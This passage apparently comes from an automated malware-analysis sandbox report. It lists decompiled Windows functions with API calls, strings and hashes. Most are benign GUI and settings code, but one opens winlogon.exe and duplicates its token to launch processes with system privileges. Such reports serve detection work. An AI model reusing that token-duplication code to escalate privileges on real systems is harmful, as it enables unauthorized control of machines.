					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

0x0040314a
0x00403151
0x00403158
0x0040315a
0x00403162
0x00403166
0x00403190
0x00403190
0x00403198
0x00403199
0x0040319e
0x004031bb
0x004031a0
0x004031ad
0x004031b6
0x004031b6
0x0040319e
0x0040316e
0x00403176
0x0040317c
0x0040317f
0x0040317f
0x00403182
0x0040318a
0x00000000
0x0040318c
0x0040318c
0x00000000
0x0040318c

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
#17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

Strings

Error, xrefs: 004031A2
comctl32.dll, xrefs: 00403145
InitCommonControlsEx, xrefs: 00403168
Error: Cannot load the common control classes., xrefs: 004031A7

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

0x00404da9
0x00404dbc
0x00404dbf
0x00404dc6
0x00404dcc
0x00404dce
0x00404de1
0x00404deb
0x00404df2
0x00404df4
0x00404df4
0x00404e07
0x00404e0d
0x00404e18
0x00404e1c
0x00404e1e
0x00404e27
0x00404e28
0x00404e29
0x00404e2f
0x00404e31
0x00404e37
0x00404e41
0x00404e42
0x00404e43
0x00404e46
0x00404e46
0x00404e1c
0x00404e4d
0x00404e50
0x00404e5f
0x00404e66
0x00404e52
0x00404e52
0x00404e52
0x00404e6d
0x00404e70
0x00404e85
0x00404e85
0x00000000
0x00404e72
0x00404e7b
0x00404e80
0x00404e83
0x00404e87
0x00404e89
0x00404e8b
0x00404e8b
0x00404ea8
0x00404ea8
0x00000000
0x00404e83

APIs

GetSystemMetrics.USER32 ref: 00404DC2
GetSystemMetrics.USER32 ref: 00404DC8
GetDC.USER32(00000000), ref: 00404DD5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
ReleaseDC.USER32 ref: 00404DF4
GetWindowRect.USER32 ref: 00404E07
GetParent.USER32(?), ref: 00404E12
GetWindowRect.USER32 ref: 00404E2F
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x0040639c
0x004063a4
0x004063b2
0x004063c2
0x004063d3
0x004063dc
0x004063eb
0x004063f0
0x00406401
0x00000000
0x0040641e
0x0040641f

APIs

Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE

wcscpy.MSVCRT ref: 004063B2
wcscpy.MSVCRT ref: 004063C2
GetPrivateProfileIntW.KERNEL32 ref: 004063D3

Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30

Strings

TranslatorName, xrefs: 004063F7
rtl, xrefs: 004063CD
TranslatorURL, xrefs: 0040640B
general, xrefs: 004063B7
charset, xrefs: 004063E1

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

0x0040adf6
0x0040adf8
0x0040adfa
0x0040adfb
0x0040adfb
0x0040ae02
0x00000000
0x00000000
0x0040ae04
0x0040ae05
0x0040ae6d
0x0040ae6e
0x0040ae73
0x0040ae76
0x0040ae7f
0x0040ae83
0x0040ae86
0x00000000
0x0040ae86
0x0040ae8f
0x0040ae0c
0x0040ae10
0x0040ae1e
0x0040ae3b
0x0040ae4a
0x0040ae65
0x0040ae7a
0x0040ae7e
0x0040ae67
0x0040ae67
0x0040ae68
0x00000000
0x0040ae68
0x0040ae4c
0x0040ae4c
0x0040ae4e
0x00000000
0x0040ae4e
0x0040ae3d
0x0040ae3d
0x0040ae3f
0x0040ae53
0x0040ae54
0x0040ae59
0x0040ae5c
0x0040ae5c
0x0040ae20
0x0040ae28
0x0040ae2d
0x0040ae30
0x0040ae30
0x0040ae12
0x0040ae12
0x0040ae13
0x00000000
0x0040ae13
0x00000000
0x0040ae10

APIs

memcpy.MSVCRT ref: 0040AE28
memcpy.MSVCRT ref: 0040AE54
memcpy.MSVCRT ref: 0040AE6E

Strings

&, xrefs: 0040AE4E
°, xrefs: 0040AE3F
>, xrefs: 0040AE13
", xrefs: 0040AE22
<br>, xrefs: 0040AE68
<, xrefs: 0040AE05

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF

Uniqueness

Uniqueness Score: -1.00%

Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}

0x004041f9
0x00404205
0x00404208
0x00404217
0x0040421e
0x00404236
0x0040423f
0x0040424a
0x0040425f
0x0040426b
0x0040426e
0x0040426e
0x00404275
0x004043be
0x004043ce
0x004043d0
0x004043d3
0x004043da
0x004043da
0x004043c0
0x004043c3
0x004043c3
0x0040427b
0x0040428c
0x0040428f
0x00404295
0x004042a5
0x004042b8
0x004042cb
0x004042de
0x004042f1
0x00404304
0x00404317
0x0040432a
0x0040433d
0x00404350
0x00404363
0x00404376
0x00404389
0x0040439c
0x004043a4
0x004043af
0x004043b5
0x004043b5
0x004043f5

APIs

memset.MSVCRT ref: 0040421E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
DragFinish.SHELL32(?), ref: 0040423F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

BeginDeferWindowPos.USER32 ref: 0040427D
EndDeferWindowPos.USER32(?), ref: 004043A4
InvalidateRect.USER32(?,?,00000001), ref: 004043AF

Strings

$, xrefs: 004043CA

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
String ID: $
API String ID: 2142561256-3993045852
Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}

0x00405b81
0x00405b88
0x00405b8a
0x00405b8a
0x00405b8f
0x00405b96
0x00405b9b
0x00405bad
0x00405bad
0x00405b9d
0x00405b9d
0x00405ba8
0x00405bab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405bab
0x00405be9
0x00405be9
0x00405baf
0x00405bb1
0x00405ce2
0x00405ce2
0x00405bb7
0x00405bbd
0x00405bf6
0x00405c4b
0x00405c4c
0x00405c52
0x00405c53
0x00000000
0x00405bf8
0x00405c02
0x00405c0e
0x00405c13
0x00405c18
0x00405c2c
0x00405c2e
0x00405c3b
0x00405c3c
0x00405c42
0x00000000
0x00405c1a
0x00405c25
0x00405c2a
0x00000000
0x00000000
0x00405c2a
0x00405c18
0x00405bbf
0x00405bc0
0x00405bcd
0x00405bce
0x00405bd7
0x00405c58
0x00405c5f
0x00405c61
0x00405c61
0x00405c63
0x00405cdb
0x00405cdb
0x00405c65
0x00405c65
0x00405c74
0x00000000
0x00405c84
0x00405c8a
0x00405c8d
0x00405c99
0x00405caf
0x00405cbd
0x00405cc8
0x00405cd4
0x00405cd9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cd9
0x00405c74
0x00405c63
0x00405ce6

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
wcscpy.MSVCRT ref: 00405C02

Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE

wcslen.MSVCRT ref: 00405C20
GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73

Strings

strings, xrefs: 00405BF8

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}

0x00401e59
0x00401e5c
0x00401e64
0x00401e67
0x00401ef9
0x00401e6d
0x00401e70
0x00401e76
0x00401e79
0x00401e7e
0x00401e83
0x00401e92
0x00401e85
0x00401e8e
0x00401e8e
0x00401e96
0x00401ee6
0x00401e98
0x00401e9b
0x00401e9e
0x00401ea3
0x00401ea8
0x00401ebb
0x00401eaa
0x00401eb7
0x00401eb7
0x00401ebf
0x00401ed3
0x00401ec1
0x00401ec7
0x00401ec9
0x00401ec9
0x00401ed8
0x00401ed8
0x00401eeb
0x00401eeb
0x00401f01

APIs

OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3

Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

Strings

winlogon.exe, xrefs: 00401E4B

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
String ID: winlogon.exe
API String ID: 1315556178-961692650
Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}

0x00405241
0x00405250
0x00405257
0x0040525f
0x00405262
0x00405265
0x00405268
0x0040526f
0x0040526f
0x00405277
0x00405277
0x0040527a
0x0040527f
0x00405284
0x00405285
0x00405291
0x00405296
0x004052a9
0x004052b3
0x004052b7
0x004052bc
0x004052ca
0x004052d2
0x004052d5
0x004052d8
0x004052d8
0x004052db
0x004052db
0x004052e1
0x004052e4
0x004052e8
0x004052f2

APIs

memset.MSVCRT ref: 00405257
_snwprintf.MSVCRT ref: 00405285
wcslen.MSVCRT ref: 00405291
memcpy.MSVCRT ref: 004052A9
wcslen.MSVCRT ref: 004052B7
memcpy.MSVCRT ref: 004052CA

Strings

%s (%s), xrefs: 0040527A

Memory Dump Source

